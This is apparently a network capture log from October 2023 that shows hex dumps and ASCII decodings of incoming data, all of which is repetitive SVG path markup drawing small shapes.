                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3275INData Raw: 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: "M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3502INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: s="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3518INData Raw: 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32
                                                                                                                                                                                                                                                        Data Ascii: .86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3534INData Raw: 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3550INData Raw: 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 5,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3566INData Raw: 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37
                                                                                                                                                                                                                                                        Data Ascii: 41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.7
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3986INData Raw: 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                        Data Ascii: 2,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><pa
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4002INData Raw: 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4018INData Raw: 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32
                                                                                                                                                                                                                                                        Data Ascii: 7.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.2
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4034INData Raw: 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4050INData Raw: 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4066INData Raw: 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39
                                                                                                                                                                                                                                                        Data Ascii: ,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.9
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4082INData Raw: 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d
                                                                                                                                                                                                                                                        Data Ascii: .38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d=
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC4098INData Raw: 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32
                                                                                                                                                                                                                                                        Data Ascii: -4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4114INData Raw: 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37
                                                                                                                                                                                                                                                        Data Ascii: 1,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4130INData Raw: 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31
                                                                                                                                                                                                                                                        Data Ascii: 2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4883INData Raw: 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3
